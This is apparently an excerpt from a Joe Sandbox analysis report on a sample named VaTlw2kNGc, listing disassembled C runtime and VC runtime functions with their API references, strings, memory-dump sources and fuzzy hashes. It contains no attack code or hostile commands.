_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B54CC

Strings

verbose, xrefs: 00007FF7691B52C0

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
Instruction ID: 4a0b4dc2d2050787467cca40af6be64adb799304cdf4baca05cb52d3f47d8e20
Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
Instruction Fuzzy Hash: E591B022A0C646C1F76AAF25F45037DB6B2AB04B95FE84136DA5D873D9EE3CE4458320

Function 00007FF7691BEED8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691BF1B7

Part of subcall function 00007FF7691B6D4C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B6D69

Strings

UTF-8, xrefs: 00007FF7691BF136
UTF-16LEUNICODE, xrefs: 00007FF7691BF155
ccs, xrefs: 00007FF7691BF0F2

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
Instruction ID: 6bd6da0e4784cef727a130e93b34c6c758fbe33866e409389363374781674e55
Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
Instruction Fuzzy Hash: E481A37AE08203C5F76C7E29E110278B6B3AB11744FF58035DA1A973EDDB2DE905A721

Function 00007FFE13304044 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 163COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE13306710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1330239E), ref: 00007FFE1330671E

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE133041C3

Strings

, xrefs: 00007FFE13304114
csm, xrefs: 00007FFE133041FD
csm, xrefs: 00007FFE13304093

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: abort
String ID: $csm$csm
API String ID: 4206212132-1512788406
Opcode ID: a1e41bd14f4dc8a012b9b6851bae8dba3a2639313cd67671a1d4b299b7556132
Instruction ID: 14df9676fac50ec4151e1d24cfdfbf85645f10e7f67e0b0115b422b790d0cd56
Opcode Fuzzy Hash: a1e41bd14f4dc8a012b9b6851bae8dba3a2639313cd67671a1d4b299b7556132
Instruction Fuzzy Hash: 7371A332A08A818AD7648F16D4407BD7BA0FB64FA8F048175DFAC27AA9CB3CD551CB44

Function 00007FF7691AC968 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7691AC993
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF7691ACA2A
RtlUnwindEx.KERNEL32 ref: 00007FF7691ACA84

Strings

csm, xrefs: 00007FF7691ACA11

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
Instruction ID: 7ef9ab6b6f7882665af7288478547980de27fb17c7de2eb67ba06ad4590e9d90
Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
Instruction Fuzzy Hash: CC518F32B19642CADF18EF25F444A79B7A1EB44B98FA08131DA5A43B85EF7DEC41C710

Function 00007FF7691AE1F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF7691AE257
_CallSETranslator.LIBVCRUNTIME ref: 00007FF7691AE2A3

Strings

MOC, xrefs: 00007FF7691AE26B
RCC, xrefs: 00007FF7691AE273

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: c1bd0f280093dc077c2402edd2c21f20ddcaf15bcc9dc74a739a9fc2baeea3e9
Instruction ID: 4f38563176fc62fbed1f6174cea3b9c63a93e835aa5724d0496b833194f72920
Opcode Fuzzy Hash: c1bd0f280093dc077c2402edd2c21f20ddcaf15bcc9dc74a739a9fc2baeea3e9
Instruction Fuzzy Hash: 21618E32908B85C6EB25AF25F4403AAB7B4FB84784F544225EB9C43B95DF7CE594CB10

Function 00007FF7691AE5A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7691AE5D0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF7691AE6B8

Strings

csm, xrefs: 00007FF7691AE70A
csm, xrefs: 00007FF7691AE5F2

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
Instruction ID: 65391e38177a33de5bf5207e9f817f474d889efe7845a00e2f09b942252b0d89
Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
Instruction Fuzzy Hash: 2B51A136A08642CAEB68AF61A048378B7B0EB54B94FA44536DA5D43FD1CF3CED50CB51

Function 00007FFE13303E1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE13306710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1330239E), ref: 00007FFE1330671E

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE13303F13
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFE13303F23

Strings

csm, xrefs: 00007FFE13303F75
csm, xrefs: 00007FFE13303E66

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: Frameabort$EmptyHandler3::StateUnwind
String ID: csm$csm
API String ID: 4108983575-3733052814
Opcode ID: 723d316c6bb1492db26d318ced58129fbbb71e04f86aecbd325fb3d3c805e488
Instruction ID: 5b87596cc6666b00ccef6c2f01896475db51f894c5a467b797d29cd1a8b79bb3
Opcode Fuzzy Hash: 723d316c6bb1492db26d318ced58129fbbb71e04f86aecbd325fb3d3c805e488
Instruction Fuzzy Hash: AB518432908A428AEB648F17954436D77A0FB60BB4F144276DBAD67BE5CF3CE550C708

Function 00007FF7691A7530 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF7691A324C,?,?,00007FF7691A3964), ref: 00007FF7691A7642

Strings

\, xrefs: 00007FF7691A75A7
%s%c, xrefs: 00007FF7691A75B4
%.*s, xrefs: 00007FF7691A75FB

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: 1156698ca0d33aa8d2468b4f0fdefbfa17a3fd1640f2d1a941dba21d9585616c
Instruction ID: f81caa457b8c00a6ea6cdb965cf09d026ac504dd434ae85c9ba9068ab4a59568
Opcode Fuzzy Hash: 1156698ca0d33aa8d2468b4f0fdefbfa17a3fd1640f2d1a941dba21d9585616c
Instruction Fuzzy Hash: 0F31B821B19AC5C9FA25AF15F8107A6A274FB44BE0FE44231EA6D43BC9DE2CDA458710

Function 00007FFE1330A714 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00007FFE1330A778

Strings

%lf, xrefs: 00007FFE1330A7BE

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: NameName::
String ID: %lf
API String ID: 1333004437-2891890143
Opcode ID: f37b8968dc856f8c22d72c120ca4476383f363961e161f929d9d255907aecf6d
Instruction ID: f5e6b3e118acf544ae5d8f87259f807cbd1e3de19d6e1f260b6e3da0b8e70eb2
Opcode Fuzzy Hash: f37b8968dc856f8c22d72c120ca4476383f363961e161f929d9d255907aecf6d
Instruction Fuzzy Hash: 5631D93290CE8189FA60CB66F85027E7760FB65BA4F4482B1E9BD67666CF3CD502C704

Function 00007FF7691A25F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7691A86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7691A3FA4,00000000,00007FF7691A1925), ref: 00007FF7691A86E9

MessageBoxW.USER32 ref: 00007FF7691A2686
MessageBoxA.USER32 ref: 00007FF7691A269A

Strings

Error, xrefs: 00007FF7691A2677
Error/warning (ANSI fallback), xrefs: 00007FF7691A268E

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Error$Error/warning (ANSI fallback)
API String ID: 1878133881-653037927
Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
Instruction ID: 0c7488aba16d5498f09aaa62c641d4c9b372210183e5b25577ab8129fa3ad34a
Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
Instruction Fuzzy Hash: 21115B72628A85C1EB28AF11F451BA9B378FB44B84FE05136DA5D47A44DF3CDA09CB50

Function 00007FF7691A2870 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7691A86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7691A3FA4,00000000,00007FF7691A1925), ref: 00007FF7691A86E9

MessageBoxW.USER32 ref: 00007FF7691A2906
MessageBoxA.USER32 ref: 00007FF7691A291A

Strings

Warning, xrefs: 00007FF7691A28F7
Error/warning (ANSI fallback), xrefs: 00007FF7691A290E

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Error/warning (ANSI fallback)$Warning
API String ID: 1878133881-2698358428
Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
Instruction ID: 9d207bdff46f80c24b73023a51e38733ac9079c85033961b2fa41e774263a076
Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
Instruction Fuzzy Hash: 6A115872628A85C1EB28AF11F451BA9B378FB44B84FE05136DA9D47A44DF3CDA09CB50

Function 00007FFE13302400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE13306710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1330239E), ref: 00007FFE1330671E

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1330243E

Strings

csm, xrefs: 00007FFE13302420
RCC, xrefs: 00007FFE13302410
MOC, xrefs: 00007FFE13302418

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: abortterminate
String ID: MOC$RCC$csm
API String ID: 661698970-2671469338
Opcode ID: b838753ef247b2fc749e3877e0128dea9035de62b0ba29f15289213c97603889
Instruction ID: 9e10e85b0756940293677bfbf6226450e051ab89da82817758c40d7f994ea109
Opcode Fuzzy Hash: b838753ef247b2fc749e3877e0128dea9035de62b0ba29f15289213c97603889
Instruction Fuzzy Hash: 09F0AF36908A42CAEB505F2AE18006C3260FB68B60F1850B1E76C57276CF3CD4D0D705

Function 00007FFE1330E9E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

__C_specific_handler.LIBVCRUNTIME ref: 00007FFE1330E9F0

Part of subcall function 00007FFE1330EC30: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FFE1330ECF0
Part of subcall function 00007FFE1330EC30: RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FFE1330E9F5), ref: 00007FFE1330ED3F

Part of subcall function 00007FFE13306710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1330239E), ref: 00007FFE1330671E

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1330EA1A

Strings

f, xrefs: 00007FFE1330E9F5
csm, xrefs: 00007FFE1330E9FB

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: C_specific_handlerCurrentImageNonwritableUnwindabortterminate
String ID: csm$f
API String ID: 2451123448-629598281
Opcode ID: c9fb23446a5b638453e0304dd207887769bfaeb8010eb75ee95ffcfd07f137de
Instruction ID: 6d73ed30cecdeb63da5884826d499ef1ed45acc4e0ef9564a7c579fd3de88bbb
Opcode Fuzzy Hash: c9fb23446a5b638453e0304dd207887769bfaeb8010eb75ee95ffcfd07f137de
Instruction Fuzzy Hash: DDE0E531E18E4284E7206B66B18013C27A0FF38B70F1480B8DA6C2766ACE3CE4A08209

Function 00007FF7691BB8B0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF7691BB92F
WriteFile.KERNEL32 ref: 00007FF7691BBBF7
WriteFile.KERNEL32 ref: 00007FF7691BBC3D
GetLastError.KERNEL32 ref: 00007FF7691BBCF3

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 0739f85a4d911baae0561c1f2f5b651aa469f8b70ac1dc09fd50f765aaaafbc7
Instruction ID: f174d3c389e2c0b0b2f8f5f514f608d6f383f6626e70715dcb2cd3081e8b72ff
Opcode Fuzzy Hash: 0739f85a4d911baae0561c1f2f5b651aa469f8b70ac1dc09fd50f765aaaafbc7
Instruction Fuzzy Hash: 86D11672B08A81C9E714DF79E4802AC77B2FB54798BA44236CE5E97F99DE38D416C310

Function 00007FF7691BC270 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7691BC25B), ref: 00007FF7691BC38C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7691BC25B), ref: 00007FF7691BC417

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 76adbd728b317254a89cb4c791728419eb9f151af89ead0c9a06842c56e3605f
Instruction ID: bed1e4dd73bf7a8061988640a79e5398d00ae7535076ccc8f4a81f5cab03360c
Opcode Fuzzy Hash: 76adbd728b317254a89cb4c791728419eb9f151af89ead0c9a06842c56e3605f
Instruction Fuzzy Hash: C991C572F08651C5FB59AF69B4802BDABB2BB44B88FB44135DE0E57A98CE3CD541C720

Function 00007FFE13309CC0 Relevance: 6.2, APIs: 4, Instructions: 193COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FFE1330C3C8: DName::operator+.LIBVCRUNTIME ref: 00007FFE1330C459
Part of subcall function 00007FFE1330C3C8: DName::operator+.LIBVCRUNTIME ref: 00007FFE1330C492
Part of subcall function 00007FFE1330C3C8: DName::operator+.LIBVCRUNTIME ref: 00007FFE1330C7BB

DName::operator+.LIBVCRUNTIME ref: 00007FFE13309E19
DName::operator+.LIBVCRUNTIME ref: 00007FFE13309E78
DName::operator+.LIBVCRUNTIME ref: 00007FFE13309EAA
DName::operator+.LIBVCRUNTIME ref: 00007FFE13309EBA

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: f50f9f5b0f4c072e52125a456639a7d4e2bd829a5a5137cb56b4f6bb80237050
Instruction ID: 68a3f2cb711c9ae72f837340675bf5e742689cb66336fdd4900695039c10b6d8
Opcode Fuzzy Hash: f50f9f5b0f4c072e52125a456639a7d4e2bd829a5a5137cb56b4f6bb80237050
Instruction Fuzzy Hash: 69916772E08F568DFB118BA2D8403AC27B1BB24728F5445B6DE6D276B5DF38A845C348

Function 00007FF7691BEC9C Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF7691BED8C
_get_daylight.LIBCMT ref: 00007FF7691BED9D
_get_daylight.LIBCMT ref: 00007FF7691BEDAE
_isindst.LIBCMT ref: 00007FF7691BEE79

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
Instruction ID: 0fbb5a587e336ef0e799c31d086331183f82f415faa418549c9ef691f0623293
Opcode Fuzzy Hash: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
Instruction Fuzzy Hash: E451D672F04112CAEB1CEF64EA556BCA7B2AB14359FA00135DD1E52AE9DF3CA502C750

Function 00007FFE1330A44C Relevance: 6.1, APIs: 4, Instructions: 134COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00007FFE1330A4F1
DName::operator+.LIBVCRUNTIME ref: 00007FFE1330A501
DName::operator+.LIBVCRUNTIME ref: 00007FFE1330A51E
